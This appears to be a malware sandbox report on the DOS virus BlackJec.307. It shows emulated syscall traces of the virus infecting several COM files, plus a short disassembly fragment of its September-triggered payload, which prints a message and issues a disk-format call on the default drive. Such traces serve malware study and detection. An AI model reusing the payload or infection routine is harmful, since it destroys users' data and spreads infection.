Sample viewer

vx.netlux.org/Virus.DOS.BlackJec.307

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:15:31.417618927Z 42 PC: 12a46 | Get date
0x12a46: cmp dh, 9
0x12a49: jne 0x12a65
0x12a4b: lea dx, word ptr [0x214]
0x12a4f: mov ah, 9
0x12a51: int 0x21
0x12a53: mov ah, 0x19
0x12a55: int 0x21
0x12a57: mov dl, al
0x12a59: mov ah, 5
0x12a5b: mov cl, 1
0x12a5d: mov ch, 0
0x12a5f: mov dh, 0
0x12a61: mov al, 0x10
0x12a63: int 0x13
0x12a65: mov cx, 0x80
0x12a68: mov si, 0x80
0x12a6b: mov di, 0xff7f
0x12a6e: rep movsb byte ptr es:[di], byte ptr [si]
0x12a70: lea ax, word ptr [0x233]
0x12a74: mov cx, ax
2018-12-17T23:15:31.420693686Z 78 PC: 12aa2 | Find first file
2018-12-17T23:15:31.428144081Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:31.429662275Z 61 PC: 12ac3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:15:31.436660358Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:31.444709798Z 63 PC: 12ad8 | Read file or device (Read 407 bytes on handle 5)
2018-12-17T23:15:31.469643535Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.487950645Z 64 PC: 12b09 | Write file or device (Write 714 bytes on handle 6)
2018-12-17T23:15:33.519616896Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.521677569Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.571248094Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.57612437Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.578439101Z 61 PC: 12ac3 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:15:33.586298944Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.588439277Z 63 PC: 12ad8 | Read file or device (Read 27 bytes on handle 6)
2018-12-17T23:15:33.596266179Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.622106981Z 64 PC: 12b09 | Write file or device (Write 334 bytes on handle 7)
2018-12-17T23:15:33.626481893Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.632537697Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.652603433Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.655684244Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.658160808Z 61 PC: 12ac3 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:15:33.665001727Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.666886139Z 63 PC: 12ad8 | Read file or device (Read 92 bytes on handle 7)
2018-12-17T23:15:33.674431061Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.70964444Z 64 PC: 12b09 | Write file or device (Write 399 bytes on handle 8)
2018-12-17T23:15:33.718354842Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.72137541Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.755331936Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.758498959Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.760100058Z 61 PC: 12ac3 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:15:33.774487602Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.776380139Z 63 PC: 12ad8 | Read file or device (Read 29 bytes on handle 8)
2018-12-17T23:15:33.783474203Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.818024646Z 64 PC: 12b09 | Write file or device (Write 336 bytes on handle 9)
2018-12-17T23:15:33.822491161Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.824133248Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.848733217Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.851976132Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.853728576Z 61 PC: 12ac3 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:15:33.862144195Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.86423267Z 63 PC: 12ad8 | Read file or device (Read 29 bytes on handle 9)
2018-12-17T23:15:33.871660061Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:33.921399273Z 64 PC: 12b09 | Write file or device (Write 336 bytes on handle 10)
2018-12-17T23:15:33.926339439Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:33.928543351Z 62 PC: 12b14 | Close file
2018-12-17T23:15:33.972882593Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:33.977574182Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:33.979741345Z 61 PC: 12ac3 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:15:33.987678765Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:33.990491893Z 63 PC: 12ad8 | Read file or device (Read 501 bytes on handle 10)
2018-12-17T23:15:33.997801853Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:34.043796036Z 64 PC: 12b09 | Write file or device (Write 808 bytes on handle 11)
2018-12-17T23:15:34.076089155Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:34.078483706Z 62 PC: 12b14 | Close file
2018-12-17T23:15:34.116314834Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:34.121262174Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:34.122796057Z 61 PC: 12ac3 | Open file (Filename = 'PAH.COM')
2018-12-17T23:15:34.130592622Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:34.133103361Z 63 PC: 12ad8 | Read file or device (Read 29 bytes on handle 11)
2018-12-17T23:15:34.140427899Z 60 PC: 12af7 | Create or truncate file
2018-12-17T23:15:34.214497593Z 64 PC: 12b09 | Write file or device (Write 336 bytes on handle 12)
2018-12-17T23:15:34.218710662Z 87 PC: 12b10 | Get or set file date and time
2018-12-17T23:15:34.221783288Z 62 PC: 12b14 | Close file
2018-12-17T23:15:34.249201594Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:34.252258651Z 47 PC: 12aad | Get disk transfer address
2018-12-17T23:15:34.254845062Z 61 PC: 12ac3 | Open file (Filename = 'TEST.COM')
2018-12-17T23:15:34.261993068Z 87 PC: 12aca | Get or set file date and time
2018-12-17T23:15:34.263845991Z 63 PC: 12ad8 | Read file or device (Read 312 bytes on handle 12)
2018-12-17T23:15:34.268204182Z 79 PC: 12b19 | Find next file
2018-12-17T23:15:34.271619051Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:46.283110233Z 42 PC: 12a46 | Get date
0x12a46: cmp dh, 9
0x12a49: jne 0x12a65
0x12a4b: lea dx, word ptr [0x214]
0x12a4f: mov ah, 9
0x12a51: int 0x21
0x12a53: mov ah, 0x19
0x12a55: int 0x21
0x12a57: mov dl, al
0x12a59: mov ah, 5
0x12a5b: mov cl, 1
0x12a5d: mov ch, 0
0x12a5f: mov dh, 0
0x12a61: mov al, 0x10
0x12a63: int 0x13
0x12a65: mov cx, 0x80
0x12a68: mov si, 0x80
0x12a6b: mov di, 0xff7f
0x12a6e: rep movsb byte ptr es:[di], byte ptr [si]
0x12a70: lea ax, word ptr [0x233]
0x12a74: mov cx, ax
2018-12-25T11:59:46.291712752Z 78 PC: 12aa2 | Find first file
2018-12-25T11:59:46.295561149Z 47 PC: 12aad | Get disk transfer address
2018-12-25T11:59:46.296282536Z 61 PC: 12ac3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:46.300554719Z 87 PC: 12aca | Get or set file date and time
2018-12-25T11:59:46.301466456Z 63 PC: 12ad8 | Read file or device (Read 407 bytes on handle 5)
2018-12-25T11:59:46.305259582Z 60 PC: 12af7 | Create or truncate file
2018-12-25T11:59:49.299251153Z 64 PC: 12b09 | Write file or device (Write 714 bytes on handle 6)
2018-12-25T11:59:49.307483406Z 87 PC: 12b10 | Get or set file date and time
2018-12-25T11:59:49.314529184Z 62 PC: 12b14 | Close file
2018-12-25T11:59:49.32287904Z 79 PC: 12b19 | Find next file
2018-12-25T11:59:49.327143024Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.328436005Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.335776079Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.338722652Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.346883218Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.359999286Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.364407101Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.365909353Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.374043961Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.37719946Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.378914164Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.385648758Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.388221061Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.394874856Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.41140841Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.425548935Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.427511502Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.436162869Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.439404548Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.440706491Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.447324756Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.449610401Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.456254574Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.468740843Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.472811501Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.47439176Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.482108594Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.484953778Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.486218822Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.492433316Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.494492121Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.511041874Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.54580854Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.549779357Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.551232602Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.591304353Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.596343236Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.599446343Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.605847824Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.608447401Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.615167479Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.627479085Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.635840047Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.638989766Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.646934355Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.64976295Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.652313609Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.658975547Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.660636372Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.66830392Z 60 PC: 12af7 | Create or truncate file (See above)
2018-12-25T11:59:49.680331798Z 64 PC: 12b09 | Write file or device (See above)
2018-12-25T11:59:49.68416664Z 87 PC: 12b10 | Get or set file date and time (See above)
2018-12-25T11:59:49.686784256Z 62 PC: 12b14 | Close file (See above)
2018-12-25T11:59:49.695372329Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.698486223Z 47 PC: 12aad | Get disk transfer address (See above)
2018-12-25T11:59:49.700896018Z 61 PC: 12ac3 | Open file (See above)
2018-12-25T11:59:49.70738491Z 87 PC: 12aca | Get or set file date and time (See above)
2018-12-25T11:59:49.708802812Z 63 PC: 12ad8 | Read file or device (See above)
2018-12-25T11:59:49.712051723Z 79 PC: 12b19 | Find next file (See above)
2018-12-25T11:59:49.714634066Z 76 PC: 12a45 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6531,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:46.663146799Z 42 PC: 12a46 | Get date
0x12a46: cmp dh, 9
0x12a49: jne 0x12a65
0x12a4b: lea dx, word ptr [0x214]
0x12a4f: mov ah, 9
0x12a51: int 0x21
0x12a53: mov ah, 0x19
0x12a55: int 0x21
0x12a57: mov dl, al
0x12a59: mov ah, 5
0x12a5b: mov cl, 1
0x12a5d: mov ch, 0
0x12a5f: mov dh, 0
0x12a61: mov al, 0x10
0x12a63: int 0x13
0x12a65: mov cx, 0x80
0x12a68: mov si, 0x80
0x12a6b: mov di, 0xff7f
0x12a6e: rep movsb byte ptr es:[di], byte ptr [si]
0x12a70: lea ax, word ptr [0x233]
0x12a74: mov cx, ax
2018-12-25T11:59:46.665813726Z 9 PC: 12a53 | Display string (String= 'Sad virus - 24/8/91 ')
2018-12-25T11:59:46.668530303Z 25 PC: 12a57 | Get default drive
2018-12-25T11:59:46.6713704Z 78 PC: 12aa2 | Find first file
2018-12-25T11:59:46.675590696Z 47 PC: 12aad | Get disk transfer address
2018-12-25T11:59:46.676406999Z 61 PC: 12ac3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:46.680295571Z 87 PC: 12aca | Get or set file date and time
2018-12-25T11:59:46.681798228Z 63 PC: 12ad8 | Read file or device (Read 407 bytes on handle 5)
2018-12-25T11:59:46.685801646Z 60 PC: 12af7 | Create or truncate file
2018-12-25T11:59:49.292733547Z 64 PC: 12b09 | Write file or device (Write 714 bytes on handle 6)
2018-12-25T11:59:49.30323649Z 87 PC: 12b10 | Get or set file date and time
2018-12-25T11:59:49.305401202Z 62 PC: 12b14 | Close file
2018-12-25T11:59:49.323659285Z 79 PC: 12b19 | Find next file
2018-12-25T11:59:49.327517292Z 76 PC: 12a45 | Terminate with return code (Return code = '0')